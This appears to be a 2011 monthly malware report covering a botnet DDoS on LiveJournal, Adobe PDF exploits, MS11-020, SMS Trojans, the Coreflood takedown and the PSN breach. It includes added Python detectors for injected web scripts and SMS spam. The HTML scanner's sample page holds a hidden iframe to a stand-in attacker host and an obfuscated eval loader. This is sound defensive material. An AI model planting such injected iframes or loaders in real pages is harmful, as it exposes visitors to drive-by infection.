DDoS attack on LiveJournal

The DDoS attack that targeted LiveJournal.com at the end of March continued into early April and was big news in Russia. The fact that we had been monitoring one of the botnets responsible for the attack meant we discovered quite a few details about the incident.

Initially, every computer in the botnet received commands to attack one or two links per day. On 4 April, however, the bots received a list of 36 links that included http://livejournal.com and http://livejournal.ru. The other links in the list led to popular pages in the Russian-language blogosphere. The pages in question were unavailable at various times on 30 March, 4 and 6 April. The attacks stopped after 6 April.

The botnet we monitored was based on the popular Optima bot which appeared for sale at the end of 2010. Several indicators suggest that the zombie network behind the DDoS attacks brought together tens of thousands of machines infected with Optima. Apart from DDoS attacks, the bot’s functionality includes downloading other executable files to infected computers and stealing passwords for a number of popular programs.

PDF exploits

Once again we have recorded a rise in the use of exploits that target vulnerabilities in Adobe products. One of these exploits – Exploit.JS.Pdfka.dmg – appeared in ninth position in the Top 20 malicious programs detected on the Internet. The number of users subjected to attacks by variations of Exploit.JS.Pdfka ran into the hundreds of thousands in April. The diagram below illustrates where the attacks were most prominent.

In April the Exploit.JS.Pdfka family was most prominent in Russia (1st place), the USA (2nd) and Germany (3rd)

For the umpteenth time cybercriminals have used the tactic of placing a malicious script on a legitimate site that has been compromised. If someone using vulnerable software visits the compromised website, the script exploits the vulnerability almost instantly and downloads one or more malicious programs to the victim’s computer. In other words, this is a classic drive-by download attack: the victim does nothing beyond opening a page they had every reason to trust.
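The injected-script pattern described above is something a site owner or incident responder can triage from the page source alone. The following added example (written for this report, not code from the original page or from any vendor) scans an HTML document for the indicators an injected drive-by loader typically leaves behind: an invisible iframe or a script tag pointing at a host other than the site's own, and inline JavaScript built from `eval`/`unescape`/`fromCharCode` calls. The sample page, the host names `www.example-blog.test` and `evil-host.invalid` and the heuristic thresholds are all constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# Calls that legitimate site scripts rarely chain together but injected
# loaders almost always do.  Threshold values below are assumptions.
OBFUSCATION_RE = re.compile(
    r"(unescape|eval|String\.fromCharCode|document\.write)\s*\(", re.IGNORECASE
)

def looks_obfuscated(js: str) -> bool:
    """Heuristic: two or more decode/eval calls, or a long run of %xx / \\x escapes."""
    call_hits = len(OBFUSCATION_RE.findall(js))
    escape_hits = js.count("%") + js.count("\\x")
    return call_hits >= 2 or escape_hits > 20

class InjectionScanner(HTMLParser):
    """Collects indicators of an injected drive-by loader on an otherwise legitimate page."""

    def __init__(self, site_host: str):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []          # list of (indicator_name, evidence)
        self._in_script = False

    def _is_external(self, url: str) -> bool:
        host = urlparse(url).hostname
        return bool(host) and host.lower() != self.site_host

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            src = a.get("src", "")
            style = a.get("style", "").replace(" ", "").lower()
            hidden = (
                a.get("width") == "0" or a.get("height") == "0"
                or "display:none" in style or "visibility:hidden" in style
            )
            if hidden and self._is_external(src):
                self.findings.append(("hidden_external_iframe", src))
        elif tag == "script":
            self._in_script = True
            src = a.get("src", "")
            if src and self._is_external(src):
                self.findings.append(("external_script", src))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands the whole <script> body to handle_data in one call.
        if self._in_script and looks_obfuscated(data):
            self.findings.append(("obfuscated_inline_script", data.strip()[:60]))

def scan_html(html: str, site_host: str):
    """Return the list of (indicator, evidence) pairs found in one page."""
    parser = InjectionScanner(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample: a legitimate blog page with two injected elements.
# The encoded string decodes to the harmless word "alert".
SAMPLE_PAGE = """<html><body>
<h1>Legitimate blog</h1>
<script src="https://www.example-blog.test/js/site.js"></script>
<iframe src="http://evil-host.invalid/in.php" width="0" height="0" style="display:none"></iframe>
<script>eval(unescape("%61%6c%65%72%74"));</script>
</body></html>"""

if __name__ == "__main__":
    for indicator, evidence in scan_html(SAMPLE_PAGE, "www.example-blog.test"):
        print(f"{indicator}: {evidence}")
```

The scanner deliberately ignores external scripts that belong to the site's own host, so on a clean page the result is an empty list; any hit is a reason to diff the page against a known-good copy and check the web server for the write that put the script there.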

In April, Adobe closed the latest series of vulnerabilities in its Adobe Reader and Adobe Acrobat products. The vulnerabilities were rated as ‘Critical’. We strongly recommend that all users update these applications if they have them installed on their computers. You can find patches for various versions of the products here: www.adobe.com/support/security/bulletins/apsb11-08.html.

Vulnerability MS11-020

April also saw Microsoft release 17 bulletins closing vulnerabilities in various Windows products. Among the 63 vulnerabilities addressed by Microsoft there is a patch for the critical MS11-020 loophole. The vulnerability was discovered in SMB Server. It allowed remote code execution if an attacker created a specially crafted SMB packet and sent the packet to a susceptible system. The vulnerability poses a serious risk – the discovery of similar vulnerabilities in the past has led to the appearance of worms such as Kido. Therefore, we strongly recommend that all users update their systems as quickly as possible.

SMS Trojans

SMS Trojans continued to spread rapidly in April, primarily in Russia. One of the ways SMS Trojans spread is via SMS spam and we received regular reports of this happening throughout the month.

There were similarities between several of the SMS spam mailings:

- the messages were sent at approximately the same time (around 1 AM GMT)
- the vast majority of the messages read as follows: “There’s an MMS for the subscriber <recipient’s telephone number>. See: http://******.do.am/<file_name>.jar”
- the malicious links used the file names YaZ.jar or 606.jar

Example of an SMS spam message

At the time the first SMS spam messages appeared, the files that the links led to were already detected by Kaspersky Lab as Trojan-SMS.J2ME.Smmer.f.

Another interesting detail is that the malicious sites the links led to appear to have been created using a free online website builder. The owner of the builder also offers hosting services, which the criminals used to host their malicious sites under the .do.am second-level domain.
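The three shared traits listed above (the fixed lure text, the .jar file names and the .do.am hosting domain, plus the clustering around 1 AM GMT) are exactly what a mobile operator or abuse team would turn into a filter. The example below is added for this report and is not code from the original page or from Kaspersky Lab; the message template, the file names YaZ.jar and 606.jar and the .do.am domain are taken from the report, while the sample messages, subdomains, phone numbers and timestamps are constructed.

```python
import re
from collections import Counter
from datetime import datetime, timezone

# Constructed sample feed of (UTC timestamp, message text) pairs; not real captures.
SAMPLE_SMS = [
    ("2011-04-12T01:02:10Z", "There's an MMS for the subscriber +7900*****01. See: http://mmsbox.do.am/YaZ.jar"),
    ("2011-04-12T01:03:44Z", "There's an MMS for the subscriber +7900*****02. See: http://photo-mms.do.am/606.jar"),
    ("2011-04-12T13:15:00Z", "Your package has shipped. Track at http://example.com/track"),
    ("2011-04-13T00:58:30Z", "There's an MMS for the subscriber +7900*****03. See: http://mms-view.do.am/YaZ.jar"),
]

URL_RE = re.compile(r"https?://([^/\s]+)(/[^\s]*)?", re.IGNORECASE)
LURE_RE = re.compile(r"there.s an mms for the subscriber", re.IGNORECASE)  # '.' absorbs either apostrophe
KNOWN_HOSTING = (".do.am",)                 # free-hosting domain named in the report
KNOWN_FILENAMES = {"yaz.jar", "606.jar"}    # file names named in the report

def extract_url(text):
    """Return (host, path) of the first URL in the message, lower-cased, or (None, None)."""
    m = URL_RE.search(text)
    if not m:
        return None, None
    return m.group(1).lower(), (m.group(2) or "").lower()

def score_sms(text):
    """Return the list of indicator names one message matches."""
    indicators = []
    if LURE_RE.search(text):
        indicators.append("mms_lure_text")
    host, path = extract_url(text)
    if host:
        if host.endswith(KNOWN_HOSTING):
            indicators.append("free_hosting_domain")
        if path.endswith(".jar"):
            indicators.append("jar_download")          # J2ME payload delivered as a download link
        if path.rsplit("/", 1)[-1] in KNOWN_FILENAMES:
            indicators.append("known_malicious_filename")
    return indicators

def is_suspicious(text, threshold=2):
    """Two independent indicators are required so a lone '.jar' link is not enough on its own."""
    return len(score_sms(text)) >= threshold

def hour_histogram(messages):
    """Count suspicious messages per UTC hour; the report's '1 AM GMT' burst shows up as one bucket."""
    counts = Counter()
    for ts, text in messages:
        if is_suspicious(text):
            hour = datetime.fromisoformat(ts.replace("Z", "+00:00")).astimezone(timezone.utc).hour
            counts[hour] += 1
    return counts

if __name__ == "__main__":
    for ts, text in SAMPLE_SMS:
        print(ts, score_sms(text))
    print("suspicious messages per UTC hour:", dict(hour_histogram(SAMPLE_SMS)))
```

Keying the filter on several weak indicators rather than the exact file name matters because the file names are the cheapest thing for the spammers to rotate; the lure text and the free-hosting domain changed far less often during the month.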

Coreflood botnet shut down

The anti-botnet campaign continues. Following the closure of the Rustock botnet, which we wrote about in last month’s report, the command centers of the huge Coreflood botnet were closed down. The majority of the 2 million zombie machines were located in the USA.

The closure was initiated by the US Department of Justice which received permission to seize control of the botnet. Commands were then sent to all the bots in the network to cease functioning.

This is not the first time that the authorities have intervened to neutralize a botnet. Rustock, for example, was shut down in a joint operation by Microsoft and US law enforcement agencies, while the Bredolab botnet was closed, and the alleged owners arrested, by Dutch police.

Let’s hope that this is not the last time we see state authorities intervening to help shut down botnets.

PlayStation Network hacked

At the end of April, Sony reported that its PlayStation Network (PSN) had been compromised. The corporation confirmed that all kinds of user data, including names, email and postal addresses, dates of birth, logins and passwords, had become available to an unknown attacker. Sony could not rule out that credit card data had been taken, though there was no evidence to suggest it had.

Sony announced it was investigating the incident in cooperation with an unnamed company.

There are around 75 million accounts registered with PSN, making the incident the biggest ever personal data leak. At the time of writing there was still no information about when PSN would be back up and running.

If you are a PSN member, we highly recommend keeping an eye on your credit card statements for signs of fraud. We further recommend immediately changing any password used on PSN that may have been reused elsewhere. Additionally, be alert to any email purporting to be from Sony or its affiliates that requests personal information.

P.S. On 2 May, Sony issued a statement saying that as a result of the hacker attack the criminals had gained access to the personal data (names, addresses, emails, gender, birth dates, telephone numbers, logins and hashed passwords) not only of PSN gamers but also users of Sony Online Entertainment. The company also said that the hackers accessed an outdated database from 2007 which contained 12,700 credit and debit card numbers and expiration dates.

TOP 20 malicious programs on the Internet

Current rank   Change in position   Verdict                              Number of attacks*
1              2                    AdWare.Win32.HotBar.dh               855838
2              4                    Trojan.JS.Popupper.aw                622035
3              New                  AdWare.Win32.Zwangi.fip              356671
4              New                  AdWare.Win32.Agent.uxx               300287
5              New                  AdWare.Win32.Gaba.eng                254277
6              New                  AdWare.Win32.FunWeb.jp               200347
7              New                  AdWare.Win32.FunWeb.kd               170909
8              New                  AdWare.Win32.Zwangi.fmz              161067
9              New                  Exploit.JS.Pdfka.dmg                 140543
10             New                  Trojan.JS.Redirector.oy              138316
11             New                  Trojan-Ransom.Win32.Digitala.bpk     133301
12             0                    Trojan.JS.Agent.uo                   109770
13             0                    Trojan-Downloader.JS.Iframe.cdh      104438
14             New                  AdWare.Win32.Gaba.enc                96553
15             -11                  Trojan.HTML.Iframe.dl                95299
16             -14                  Hoax.Win32.ArchSMS.pxm               94255
17             New                  Trojan-Downloader.Win32.Zlob.aces    88092
18             New                  Trojan-Ransom.JS.SMSer.hi            83885
19             New                  Trojan.JS.Iframe.ku                  77796
20             New                  AdWare.Win32.FunWeb.jt               65895

* Total number of unique incidents detected by web antivirus on users’ computers